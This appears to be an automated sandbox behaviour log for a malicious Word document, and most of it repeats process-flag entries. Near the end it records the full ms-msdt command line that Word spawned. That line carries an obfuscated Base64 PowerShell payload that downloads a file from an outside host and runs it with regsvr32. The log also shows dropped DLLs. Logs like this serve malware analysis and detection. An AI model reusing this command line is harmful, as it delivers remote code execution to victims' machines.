Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msdt.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msdt.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msdt.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msdt.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msdt.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msdt.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msdt.exe Window / User API: threadDelayed 1632 Jump to behavior
Source: C:\Windows\SysWOW64\msdt.exe Window / User API: threadDelayed 665 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\ddzr0cba\ddzr0cba.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\xwo13jpt\xwo13jpt.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\qe5jzpda\qe5jzpda.dll Jump to dropped file
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process created: C:\Windows\SysWOW64\msdt.exe C:\Windows\system32\msdt.exe" ms-msdt:/id PCWDiagnostic /skip force /param "IT_RebrowseForFile=? IT_LaunchMethod=ContextMenu IT_BrowseForFile=$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'Unicode.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'JABwACAAPQAgACQARQBuAHYAOgB0AGUAbQBwADsAaQB3AHIAIABoAHQAdABwAHMAOgAvAC8AYQBsAHMALQBvAG4AbABpAG4AZQAuAG8AcgBnAC8ASgBRAFcAagA3ADgALwBZAC4AcABuAGcAIAAtAE8AdQB0AEYAaQBsAGUAIAAkAHAAXABGAHIAbwBzAC4AcABvAHMAdABlAHIAOwByAGUAZwBzAHYAcgAzADIAIAAkAHAAXABGAHIAbwBzAC4AcABvAHMAdABlAHIA'+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process created: C:\Windows\SysWOW64\msdt.exe C:\Windows\system32\msdt.exe" ms-msdt:/id PCWDiagnostic /skip force /param "IT_RebrowseForFile=? IT_LaunchMethod=ContextMenu IT_BrowseForFile=$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'Unicode.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'JABwACAAPQAgACQARQBuAHYAOgB0AGUAbQBwADsAaQB3AHIAIABoAHQAdABwAHMAOgAvAC8AYQBsAHMALQBvAG4AbABpAG4AZQAuAG8AcgBnAC8ASgBRAFcAagA3ADgALwBZAC4AcABuAGcAIAAtAE8AdQB0AEYAaQBsAGUAIAAkAHAAXABGAHIAbwBzAC4AcABvAHMAdABlAHIAOwByAGUAZwBzAHYAcgAzADIAIAAkAHAAXABGAHIAbwBzAC4AcABvAHMAdABlAHIA'+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES374A.tmp" "c:\Users\user\AppData\Local\Temp\qe5jzpda\CSC4563D2ED18334995B732DDC516AA1E81.TMP" Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES4C97.tmp" "c:\Users\user\AppData\Local\Temp\xwo13jpt\CSC9D13466D68BE46EAAB5DAAD8B4EDFE4C.TMP" Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESB3CD.tmp" "c:\Users\user\AppData\Local\Temp\ddzr0cba\CSC44E4BCADDF3245FBA3B96135AF703040.TMP" Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE Queries volume information: C:\Users\user\AppData\Local\Microsoft\Office\16.0\OfficeFileCache\CentralTable.accdb VolumeInformation Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE Queries volume information: C:\Users\user\AppData\Local\Microsoft\Office\16.0\OfficeFileCache\CentralTable.laccdb VolumeInformation Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE Queries volume information: C:\Users\user\AppData\Local\Microsoft\Office\16.0\OfficeFileCache\CentralTable.laccdb VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\msdt.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00116~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\msdt.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs